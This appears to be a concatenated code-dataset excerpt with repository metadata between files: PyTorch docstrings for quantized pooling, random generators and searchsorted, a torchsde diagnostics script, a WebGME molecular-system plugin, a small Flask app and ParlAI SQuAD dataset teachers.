tensor([[[[-0.2000, -0.2000],
[ 1.6000, -0.2000]],
[[-0.4000, -0.4000],
[-0.4000, 0.6000]]],
[[[-0.2000, -0.2000],
[-0.2000, -0.2000]],
[[ 0.6000, -0.4000],
[ 0.6000, -0.4000]]]], size=(2, 2, 2, 2), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.2, zero_point=2)
""")
add_docstr(torch.quantized_max_pool1d,
r"""
quantized_max_pool1d(input, kernel_size, stride=[], padding=0, dilation=1, ceil_mode=False) -> Tensor
Applies a 1D max pooling over an input quantized tensor composed of several input planes.
Arguments:
input (Tensor): quantized tensor
kernel_size (list of int): the size of the sliding window
stride (``list of int``, optional): the stride of the sliding window
padding (``list of int``, opttional): padding to be added on both sides, must be >= 0 and <= kernel_size / 2
dilation (``list of int``, optional): The stride between elements within a sliding window, must be > 0. Default 1
ceil_mode (bool, optional): If True, will use ceil instead of floor to compute the output shape.
Defaults to False.
Returns:
Tensor: A quantized tensor with max_pool1d applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_max_pool1d(qx, [2])
tensor([[0.0000],
[1.5000]], size=(2, 1), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=1.5, zero_point=3)
""")
add_docstr(torch.quantized_max_pool2d,
r"""
quantized_max_pool2d(input, kernel_size, stride=[], padding=0, dilation=1, ceil_mode=False) -> Tensor
Applies a 2D max pooling over an input quantized tensor composed of several input planes.
Arguments:
input (Tensor): quantized tensor
kernel_size (``list of int``): the size of the sliding window
stride (``list of int``, optional): the stride of the sliding window
padding (``list of int``, optional): padding to be added on both sides, must be >= 0 and <= kernel_size / 2
dilation (``list of int``, optional): The stride between elements within a sliding window, must be > 0. Default 1
ceil_mode (bool, optional): If True, will use ceil instead of floor to compute the output shape.
Defaults to False.
Returns:
Tensor: A quantized tensor with max_pool2d applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2, 2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_max_pool2d(qx, [2,2])
tensor([[[[1.5000]],
[[1.5000]]],
[[[0.0000]],
[[0.0000]]]], size=(2, 2, 1, 1), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=1.5, zero_point=3)
""")
add_docstr(torch.Generator,
r"""
Generator(device='cpu') -> Generator
Creates and returns a generator object that manages the state of the algorithm which
produces pseudo random numbers. Used as a keyword argument in many :ref:`inplace-random-sampling`
functions.
Arguments:
device (:class:`torch.device`, optional): the desired device for the generator.
Returns:
Generator: An torch.Generator object.
Example::
>>> g_cpu = torch.Generator()
>>> g_cuda = torch.Generator(device='cuda')
""")
add_docstr(torch.Generator.set_state,
r"""
Generator.set_state(new_state) -> void
Sets the Generator state.
Arguments:
new_state (torch.ByteTensor): The desired state.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu_other = torch.Generator()
>>> g_cpu.set_state(g_cpu_other.get_state())
""")
add_docstr(torch.Generator.get_state,
r"""
Generator.get_state() -> Tensor
Returns the Generator state as a ``torch.ByteTensor``.
Returns:
Tensor: A ``torch.ByteTensor`` which contains all the necessary bits
to restore a Generator to a specific point in time.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.get_state()
""")
add_docstr(torch.Generator.manual_seed,
r"""
Generator.manual_seed(seed) -> Generator
Sets the seed for generating random numbers. Returns a `torch.Generator` object.
It is recommended to set a large seed, i.e. a number that has a good balance of 0
and 1 bits. Avoid having many 0 bits in the seed.
Arguments:
seed (int): The desired seed. Value must be within the inclusive range
`[-0x8000_0000_0000_0000, 0xffff_ffff_ffff_ffff]`. Otherwise, a RuntimeError
is raised. Negative inputs are remapped to positive values with the formula
`0xffff_ffff_ffff_ffff + seed`.
Returns:
Generator: An torch.Generator object.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.manual_seed(2147483647)
""")
add_docstr(torch.Generator.initial_seed,
r"""
Generator.initial_seed() -> int
Returns the initial seed for generating random numbers.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.initial_seed()
2147483647
""")
add_docstr(torch.Generator.seed,
r"""
Generator.seed() -> int
Gets a non-deterministic random number from std::random_device or the current
time and uses it to seed a Generator.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.seed()
1516516984916
""")
add_docstr(torch.Generator.device,
r"""
Generator.device -> device
Gets the current device of the generator.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.device
device(type='cpu')
""")
add_docstr(torch._assert_async,
r"""
_assert_async(tensor) -> void
Asynchronously assert that the contents of tensor are nonzero. For CPU tensors,
this is equivalent to ``assert tensor`` or ``assert tensor.is_nonzero()``; for
CUDA tensors, we DO NOT synchronize and you may only find out the assertion
failed at a later CUDA kernel launch. Asynchronous assertion can be helpful for
testing invariants in CUDA tensors without giving up performance. This function
is NOT intended to be used for regular error checking, as it will trash your CUDA
context if the assert fails (forcing you to restart your PyTorch process.)
Args:
tensor (Tensor): a one element tensor to test to see if it is nonzero. Zero
elements (including False for boolean tensors) cause an assertion failure
to be raised.
""")
add_docstr(torch.searchsorted,
r"""
searchsorted(sorted_sequence, values, *, out_int32=False, right=False, side='left', out=None, sorter=None) -> Tensor
Find the indices from the *innermost* dimension of :attr:`sorted_sequence` such that, if the
corresponding values in :attr:`values` were inserted before the indices, when sorted, the order
of the corresponding *innermost* dimension within :attr:`sorted_sequence` would be preserved.
Return a new tensor with the same size as :attr:`values`. If :attr:`right` is False or side is
'left (default), then the left boundary of :attr:`sorted_sequence` is closed. More formally,
the returned index satisfies the following rules:
.. list-table::
:widths: 12 10 78
:header-rows: 1
* - :attr:`sorted_sequence`
- :attr:`right`
- *returned index satisfies*
* - 1-D
- False
- ``sorted_sequence[i-1] < values[m][n]...[l][x] <= sorted_sequence[i]``
* - 1-D
- True
- ``sorted_sequence[i-1] <= values[m][n]...[l][x] < sorted_sequence[i]``
* - N-D
- False
- ``sorted_sequence[m][n]...[l][i-1] < values[m][n]...[l][x] <= sorted_sequence[m][n]...[l][i]``
* - N-D
- True
- ``sorted_sequence[m][n]...[l][i-1] <= values[m][n]...[l][x] < sorted_sequence[m][n]...[l][i]``
Args:
sorted_sequence (Tensor): N-D or 1-D tensor, containing monotonically increasing sequence on the *innermost*
dimension unless :attr:`sorter` is provided, in which case the sequence does not
need to be sorted
values (Tensor or Scalar): N-D tensor or a Scalar containing the search value(s).
Keyword args:
out_int32 (bool, optional): indicate the output data type. torch.int32 if True, torch.int64 otherwise.
Default value is False, i.e. default output data type is torch.int64.
right (bool, optional): if False, return the first suitable location that is found. If True, return the
last such index. If no suitable index found, return 0 for non-numerical value
(eg. nan, inf) or the size of *innermost* dimension within :attr:`sorted_sequence`
(one pass the last index of the *innermost* dimension). In other words, if False,
gets the lower bound index for each value in :attr:`values` on the corresponding
*innermost* dimension of the :attr:`sorted_sequence`. If True, gets the upper
bound index instead. Default value is False. :attr:`side` does the same and is
preferred. It will error if :attr:`side` is set to "left" while this is True.
side (str, optional): the same as :attr:`right` but preferred. "left" corresponds to False for :attr:`right`
and "right" corresponds to True for :attr:`right`. It will error if this is set to
"left" while :attr:`right` is True.
out (Tensor, optional): the output tensor, must be the same size as :attr:`values` if provided.
sorter (LongTensor, optional): if provided, a tensor matching the shape of the unsorted
:attr:`sorted_sequence` containing a sequence of indices that sort it in the
ascending order on the innermost dimension
Example::
>>> sorted_sequence = torch.tensor([[1, 3, 5, 7, 9], [2, 4, 6, 8, 10]])
>>> sorted_sequence
tensor([[ 1, 3, 5, 7, 9],
[ 2, 4, 6, 8, 10]])
>>> values = torch.tensor([[3, 6, 9], [3, 6, 9]])
>>> values
tensor([[3, 6, 9],
[3, 6, 9]])
>>> torch.searchsorted(sorted_sequence, values)
tensor([[1, 3, 4],
[1, 2, 4]])
>>> torch.searchsorted(sorted_sequence, values, side='right')
tensor([[2, 3, 5],
[1, 3, 4]])
>>> sorted_sequence_1d = torch.tensor([1, 3, 5, 7, 9])
>>> sorted_sequence_1d
tensor([1, 3, 5, 7, 9])
>>> torch.searchsorted(sorted_sequence_1d, values)
tensor([[1, 3, 4],
[1, 3, 4]])
""")
add_docstr(torch.bucketize,
r"""
bucketize(input, boundaries, *, out_int32=False, right=False, out=None) -> Tensor
Returns the indices of the buckets to which each value in the :attr:`input` belongs, where the
boundaries of the buckets are set by :attr:`boundaries`. Return a new tensor with the same size
as :attr:`input`. If :attr:`right` is False (default), then the left boundary is closed. More
formally, the returned index satisfies the following rules:
.. list-table::
:widths: 15 85
:header-rows: 1
* - :attr:`right`
- *returned index satisfies*
* - False
- ``boundaries[i-1] < input[m][n]...[l][x] <= boundaries[i]``
* - True
- ``boundaries[i-1] <= input[m][n]...[l][x] < boundaries[i]``
Args:
input (Tensor or Scalar): N-D tensor or a Scalar containing the search value(s).
boundaries (Tensor): 1-D tensor, must contain a monotonically increasing sequence.
Keyword args:
out_int32 (bool, optional): indicate the output data type. torch.int32 if True, torch.int64 otherwise.
Default value is False, i.e. default output data type is torch.int64.
right (bool, optional): if False, return the first suitable location that is found. If True, return the
last such index. If no suitable index found, return 0 for non-numerical value
(eg. nan, inf) or the size of :attr:`boundaries` (one pass the last index).
In other words, if False, gets the lower bound index for each value in :attr:`input`
from :attr:`boundaries`. If True, gets the upper bound index instead.
Default value is False.
out (Tensor, optional): the output tensor, must be the same size as :attr:`input` if provided.
Example::
>>> boundaries = torch.tensor([1, 3, 5, 7, 9])
>>> boundaries
tensor([1, 3, 5, 7, 9])
>>> v = torch.tensor([[3, 6, 9], [3, 6, 9]])
>>> v
tensor([[3, 6, 9],
[3, 6, 9]])
>>> torch.bucketize(v, boundaries)
tensor([[1, 3, 4],
[1, 3, 4]])
>>> torch.bucketize(v, boundaries, right=True)
tensor([[2, 3, 5],
[2, 3, 5]])
""")
| 31.774256
| 132
| 0.622418
|
45fbad5188b1cfd2518a807e6444f61981addf51
| 2,201
|
py
|
Python
|
diagnostics/ito_diagonal.py
|
emaballarin/torchsde
|
83373b30c9bd447ec32a8c286c42a4cf5e9753a6
|
[
"Apache-2.0"
] | 984
|
2020-07-06T23:15:17.000Z
|
2022-03-31T10:09:49.000Z
|
diagnostics/ito_diagonal.py
|
GabrielNobis/torchsde
|
53038a3efcd77f6c9f3cfd0310700a59be5d5d2d
|
[
"Apache-2.0"
] | 95
|
2020-07-11T10:53:02.000Z
|
2022-03-30T21:33:56.000Z
|
diagnostics/ito_diagonal.py
|
GabrielNobis/torchsde
|
53038a3efcd77f6c9f3cfd0310700a59be5d5d2d
|
[
"Apache-2.0"
] | 117
|
2020-07-07T20:05:05.000Z
|
2022-03-20T21:30:23.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import torch
from tests.problems import NeuralDiagonal
from torchsde import BrownianInterval
from torchsde.settings import LEVY_AREA_APPROXIMATIONS
from . import inspection
from . import utils
def main():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.set_default_dtype(torch.float64)
utils.manual_seed()
small_batch_size, large_batch_size, d = 16, 16384, 5
t0, t1, steps, dt = 0., 2., 10, 1e-1
ts = torch.linspace(t0, t1, steps=steps, device=device)
dts = tuple(2 ** -i for i in range(1, 7)) # For checking strong order.
sde = NeuralDiagonal(d=d).to(device)
methods = ('euler', 'milstein', 'milstein', 'srk')
options = (None, None, dict(grad_free=True), None)
labels = ('euler', 'milstein', 'gradient-free milstein', 'srk')
img_dir = os.path.join(os.path.dirname(__file__), 'plots', 'ito_diagonal')
y0 = torch.full((small_batch_size, d), fill_value=0.1, device=device)
bm = BrownianInterval(
t0=t0, t1=t1, size=(small_batch_size, d), dtype=y0.dtype, device=device,
levy_area_approximation=LEVY_AREA_APPROXIMATIONS.space_time
)
inspection.inspect_samples(y0, ts, dt, sde, bm, img_dir, methods, options, labels)
y0 = torch.full((large_batch_size, d), fill_value=0.1, device=device)
bm = BrownianInterval(
t0=t0, t1=t1, size=(large_batch_size, d), dtype=y0.dtype, device=device,
levy_area_approximation=LEVY_AREA_APPROXIMATIONS.space_time
)
inspection.inspect_orders(y0, t0, t1, dts, sde, bm, img_dir, methods, options, labels)
if __name__ == '__main__':
main()
| 37.948276
| 90
| 0.711949
|
dc954d0946f47b289e79e76910312bb1c47bbefd
| 135
|
py
|
Python
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2021-06-17T18:24:25.000Z
|
2021-06-17T18:24:25.000Z
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:01:04.000Z
|
2022-01-13T01:47:17.000Z
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import unicode_literals
TEST_COMMENT_TEXT = 'test comment text'
TEST_COMMENT_TEXT_EDITED = 'test comment text edited'
| 27
| 53
| 0.837037
|
c0e102fd1d14ca6e810bffc24ee261696ea4d72f
| 7,537
|
py
|
Python
|
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/molsim-specification
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | null | null | null |
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/molsim-specification
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | 7
|
2020-10-13T19:50:43.000Z
|
2020-10-15T05:22:00.000Z
|
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/webgme-molsim
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | null | null | null |
"""
This is where the implementation of the plugin code goes.
The createSystems-class is imported from both run_plugin.py and run_debug.py
"""
import sys
import json
import logging
from .gmso_systems import GMSOSystems
from webgme_bindings import PluginBase
# Setup a logger
logger = logging.getLogger('createSystems')
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout) # By default it logs to stderr..
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
DEFAULT_ATTR = 'pyJSON'
class createSystems(PluginBase):
def main(self):
core = self.core
root_node = self.root_node
active_node = self.active_node
name = core.get_attribute(active_node, 'name')
logger.info('ActiveNode at "{0}" has name {1}'.format(core.get_path(active_node), name))
for system in GMSOSystems.systems():
self.convert_to_nodes(system)
commit_info = self.util.save(root_node, self.commit_hash, 'master', 'Python plugin updated the model')
logger.info('committed :{0}'.format(commit_info))
def convert_to_nodes(self, topology):
system = self.core.create_node(
{
'parent': self.active_node,
'base': self.META.get('System')
}
)
self.core.set_attribute(system, name='name', value=topology.name)
self.logger.info(f'Created system node with name {topology.name}')
atom_nodes = {}
atom_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_atom_types',
target='AtomType'
)
self.logger.info(f'Added {len(atom_type_nodes)} AtomTypes')
bond_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_bond_types',
target='BondType'
)
self.logger.info(f'Added {len(bond_type_nodes)} BondTypes')
angle_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_angle_types',
target='AngleType'
)
self.logger.info(f'Added {len(angle_type_nodes)} AngleTypes')
dihedral_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_dihedral_types',
target='DihedralType'
)
self.logger.info(f'Added {len(dihedral_type_nodes)} DihedralTypes')
improper_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_improper_types',
target='ImproperType'
)
self.logger.info(f'Added {len(improper_type_nodes)} ImproperTypes')
for atom in topology.sites:
atom_nodes[id(atom)] = self.core.create_node({
'parent': system,
'base': self.META.get('Atom')
})
self.core.set_attribute(
atom_nodes[id(atom)], name='name', value=atom.name
)
for key in self.core.get_valid_attribute_names(atom_nodes[id(atom)]):
json_dict = json.loads(atom.json(by_alias=True))
if key in json_dict:
self.core.set_attribute(
atom_nodes[id(atom)],
name=key,
value=str(json_dict.get(key))
)
if atom.atom_type is not None:
atype_node = atom_type_nodes[atom.atom_type]
self.core.set_pointer(
atom_nodes[id(atom)],
name='potential',
target=atype_node
)
for bond in topology.bonds:
atom_1 = atom_nodes[id(bond.connection_members[0])]
atom_2 = atom_nodes[id(bond.connection_members[1])]
src = self.core.create_node({
'parent': atom_1,
'base': self.META.get('AtomPort')
})
dst = self.core.create_node({
'parent': atom_2,
'base': self.META.get('AtomPort')
})
bond = self.core.create_node({
'parent': system,
'base': self.META.get('Bond')
})
self.core.set_pointer(bond, name='src', target=src)
self.core.set_pointer(bond, name='dst', target=dst)
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='angles',
target='Angle')
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='dihedrals',
target='Dihedral')
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='impropers',
target='Improper')
def _add_potential_nodes(self,
parent,
topology,
potential_attr='_atom_types',
target='AtomType'):
potential_types = getattr(topology, potential_attr)
potential_type_nodes = {}
for potential_type in potential_types.values():
potential_node = self.core.create_node({
'parent': parent,
'base': self.META.get(target)
})
self._assign_attributes_to_node(
py_object=potential_type,
target_node=potential_node
)
potential_type_nodes[potential_type] = potential_node
return potential_type_nodes
def _assign_attributes_to_node(self, py_object, target_node):
for key in self.core.get_valid_attribute_names(target_node):
json_str = py_object.json(by_alias=True)
json_dict = json.loads(json_str)
if key in json_dict:
self.core.set_attribute(
target_node,
name=key,
value=str(json_dict.get(key))
)
self.core.set_attribute(target_node, name=DEFAULT_ATTR, value=json_str)
def _add_connection_nodes(self,
parent,
topology,
atom_nodes,
connection_attr='angles',
target='Angle'):
connections = getattr(topology, connection_attr)
for connection in connections:
atoms = [atom_nodes[id(atom)] for atom in connection.connection_members]
connection_node = self.core.create_node({
'parent': parent,
'base': self.META.get(target)
})
self._assign_attributes_to_node(
py_object=connection,
target_node=connection_node
)
for atom in atoms:
self.core.add_member(
node=connection_node,
name='connectionMembers',
member=atom
)
| 34.573394
| 110
| 0.532042
|
e9b47d7a88c576faa5e502c2cbff443c76d7688b
| 323
|
py
|
Python
|
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
from flask import Flask, jsonify, request
import time
app = Flask(__name__)
@app.route("/loans", method=["POST"])
# responce
def response():
query = dict(request.form)['query']
result = query + " " + time.ctime()
return jsonify({"response": result})
if __name__ == "__main__":
app.run(host="0.0.0.0",)
| 19
| 41
| 0.637771
|
1a42a49302e54a2093eefe2b7226982a2bc67688
| 13,920
|
py
|
Python
|
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | 1
|
2020-12-22T23:20:05.000Z
|
2020-12-22T23:20:05.000Z
|
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | null | null | null |
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import json
import os
from parlai.core.message import Message
from parlai.core.opt import Opt
from parlai.core.teachers import FixedDialogTeacher, DialogTeacher, ParlAIDialogTeacher
from parlai.tasks.wrapper.agents import AbstractWrapperTeacher
from parlai.utils.io import PathManager
from .build import build
def get_sentence_tokenizer():
"""
Loads the nltk sentence tokenizer.
"""
try:
import nltk
except ImportError:
raise ImportError('Please install nltk (e.g. pip install nltk).')
# nltk-specific setup
st_path = 'tokenizers/punkt/{0}.pickle'.format('english')
try:
sent_tok = nltk.data.load(st_path)
except LookupError:
nltk.download('punkt')
sent_tok = nltk.data.load(st_path)
return sent_tok
class IndexTeacher(FixedDialogTeacher):
"""
Hand-written SQuAD teacher, which loads the json squad data and implements its own
`act()` method for interacting with student agent, rather than inheriting from the
core Dialog Teacher. This code is here as an example of rolling your own without
inheritance.
This teacher also provides access to the "answer_start" indices that specify the
location of the answer in the context.
"""
def __init__(self, opt, shared=None):
build(opt)
super().__init__(opt, shared)
if self.datatype.startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
datapath = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.data = self._setup_data(datapath)
self.id = 'squad'
self.reset()
def num_examples(self):
return len(self.examples)
def num_episodes(self):
return self.num_examples()
def get(self, episode_idx, entry_idx=None):
article_idx, paragraph_idx, qa_idx = self.examples[episode_idx]
article = self.squad[article_idx]
paragraph = article['paragraphs'][paragraph_idx]
qa = paragraph['qas'][qa_idx]
question = qa['question']
answers = []
answer_starts = []
for a in qa['answers']:
answers.append(a['text'])
answer_starts.append(a['answer_start'])
context = paragraph['context']
action = {
'id': 'squad',
'text': context + '\n' + question,
'labels': answers,
'episode_done': True,
'answer_starts': answer_starts,
}
return action
def _setup_data(self, path):
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
self.examples = []
for article_idx in range(len(self.squad)):
article = self.squad[article_idx]
for paragraph_idx in range(len(article['paragraphs'])):
paragraph = article['paragraphs'][paragraph_idx]
num_questions = len(paragraph['qas'])
for qa_idx in range(num_questions):
self.examples.append((article_idx, paragraph_idx, qa_idx))
class DefaultTeacher(DialogTeacher):
"""
This version of SQuAD inherits from the core Dialog Teacher, which just requires it
to define an iterator over its data `setup_data` in order to inherit basic metrics,
a default `act` function.
For SQuAD, this does not efficiently store the paragraphs in memory.
"""
def __init__(self, opt, shared=None):
self.datatype = opt['datatype']
build(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
opt['datafile'] = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.id = 'squad'
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = tuple(a['text'] for a in qa['answers'])
context = paragraph['context']
yield (context + '\n' + question, answers), True
class OpensquadTeacher(DialogTeacher):
"""
This version of SQuAD inherits from the core Dialog Teacher, which just requires it
to define an iterator over its data `setup_data` in order to inherit basic metrics,
a default `act` function.
Note: This teacher omits the context paragraph
"""
def __init__(self, opt, shared=None):
self.datatype = opt['datatype']
build(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
opt['datafile'] = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.id = 'squad'
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = (a['text'] for a in qa['answers'])
yield (question, answers), True
class TitleTeacher(DefaultTeacher):
"""
This version of SquAD inherits from the Default Teacher.
The only
difference is that the 'text' field of an observation will contain
the title of the article separated by a newline from the paragraph and the
query.
Note: The title will contain underscores, as it is the part of the link for
the Wikipedia page; i.e., the article is at the site:
https://en.wikipedia.org/wiki/{TITLE}
Depending on your task, you may wish to remove underscores.
"""
def __init__(self, opt, shared=None):
self.id = 'squad_title'
build(opt)
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
title = article['title']
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = (a['text'] for a in qa['answers'])
context = paragraph['context']
yield ('\n'.join([title, context, question]), answers), True
class FulldocTeacher(ParlAIDialogTeacher):
def __init__(self, opt, shared=None):
build(opt)
opt = copy.deepcopy(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'valid'
datafile = os.path.join(
opt['datapath'], 'SQuAD-fulldoc', "squad_fulldocs." + suffix + ":ordered"
)
opt['parlaidialogteacher_datafile'] = datafile
super().__init__(opt, shared)
self.id = 'squad-fulldoc'
self.reset()
class SentenceTeacher(IndexTeacher):
"""
Teacher where the label(s) are the sentences that contain the true answer.
Some punctuation may be removed from the context and the answer for
tokenization purposes.
If `include_context` is False, the teacher returns action dict in the
following format:
{
'context': <context>,
'text': <question>,
'labels': <sentences containing the true answer>,
'label_candidates': <all sentences in the context>,
'episode_done': True,
'answer_starts': <index of start of answer in context>
}
Otherwise, the 'text' field contains <context>\n<question> and there is
no separate context field.
"""
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.sent_tok = get_sentence_tokenizer()
self.include_context = opt.get('include_context', False)
@staticmethod
def add_cmdline_args(argparser):
agent = argparser.add_argument_group('SQuAD Sentence Teacher Arguments')
agent.add_argument(
'--include-context',
type='bool',
default=False,
help='include context within text instead of as a ' 'separate field',
)
def get(self, episode_idx, entry_idx=None):
article_idx, paragraph_idx, qa_idx = self.examples[episode_idx]
article = self.squad[article_idx]
paragraph = article['paragraphs'][paragraph_idx]
qa = paragraph['qas'][qa_idx]
context = paragraph['context']
question = qa['question']
answers = [a['text'] for a in qa['answers']]
# remove '.', '?', '!' from answers for proper sentence
# tokenization
edited_answers = []
for answer in answers:
new_answer = answer.replace('.', '').replace('?', '').replace('!', '')
context = context.replace(answer, new_answer)
edited_answers.append(new_answer)
edited_sentences = self.sent_tok.tokenize(context)
labels = []
label_starts = []
for sentence in edited_sentences:
for answer in edited_answers:
if answer in sentence and sentence not in labels:
labels.append(sentence)
label_starts.append(context.index(sentence))
break
action = {
'context': context,
'text': question,
'labels': labels,
'label_candidates': edited_sentences,
'episode_done': True,
'answer_starts': label_starts,
}
if self.include_context:
action['text'] = action['context'] + '\n' + action['text']
del action['context']
return action
class FulldocsentenceTeacher(FulldocTeacher):
"""
Teacher which contains the question as the text, the sentences as the label
candidates, and the label as the sentence containing the answer.
Some punctuation may be removed for tokenization purposes.
If `include_context` is False, the teacher returns action dict in the
following format:
{
'context': <context>,
'text': <question>,
'labels': <sentences containing the true answer>,
'label_candidates': <all sentences in the context>,
'episode_done': True,
'answer_starts': <index of start of answer in context>
}
Otherwise, the 'text' field contains <context>\n<question> and there is
no separate context field.
"""
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.sent_tok = get_sentence_tokenizer()
self.include_context = opt.get('include_context', False)
@staticmethod
def add_cmdline_args(argparser):
agent = argparser.add_argument_group('SQuAD Fulldoc Sentence Teacher Arguments')
agent.add_argument(
'--include-context',
type='bool',
default=False,
help='include context within text instead of as a ' 'separate field',
)
def get(self, episode_idx, entry_idx=None):
action = {}
episode = self.episodes[episode_idx][entry_idx]
context = ' '.join(episode['text'].split('\n')[:-1]).replace(
'\xa0', ' '
) # get rid of non breaking space characters
question = episode['text'].split('\n')[-1]
label_field = 'labels' if 'labels' in episode else 'eval_labels'
answers = []
for answer in episode[label_field]:
new_answer = answer.replace('.', '').replace('?', '').replace('!', '')
context = context.replace(answer, new_answer)
answers.append(new_answer)
sentences = self.sent_tok.tokenize(context)
labels = []
label_starts = []
for sentence in sentences:
for answer in answers:
if answer in sentence and sentence not in labels:
labels.append(sentence)
label_starts.append(context.index(sentence))
action = {
'context': context,
'text': question,
label_field: labels,
'answer_starts': label_starts,
'label_candidates': sentences,
'episode_done': episode['episode_done'],
}
if self.include_context:
action['text'] = action['context'] + '\n' + action['text']
del action['context']
return action
class SquadQATeacher(AbstractWrapperTeacher):
"""
Wrapper Teacher over SQuAD to get only the passage, and ignore the question.
"""
@classmethod
def add_cmdline_args(cls, parser):
parser.set_defaults(wrapper_task='squad')
def __init__(self, opt: Opt, shared=None):
super().__init__(opt, shared)
def _edit_action(self, act: Message) -> Message:
"""
# SQuAD returns passage and question both, only passage required for task.
"""
passage = act['text'].split('\n')[0]
act.force_set('text', passage)
return act
| 34.8
| 88
| 0.602874
|
002c5a90899ee455debe44ddf682e52a2558eee3
| 4,113
|
py
|
Python
|
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | null | null | null |
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
# -*- coding: utf-8 -*-
"""
